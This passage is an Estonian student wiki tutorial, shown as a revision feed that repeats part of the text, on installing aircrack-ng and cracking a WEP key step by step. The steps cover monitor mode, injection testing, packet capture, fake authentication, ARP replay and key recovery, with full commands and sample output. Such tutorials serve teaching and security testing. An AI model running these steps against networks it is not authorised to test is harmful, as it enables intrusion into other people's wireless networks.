* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89283</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89283"/>
		<updated>2015-05-25T19:14:56Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
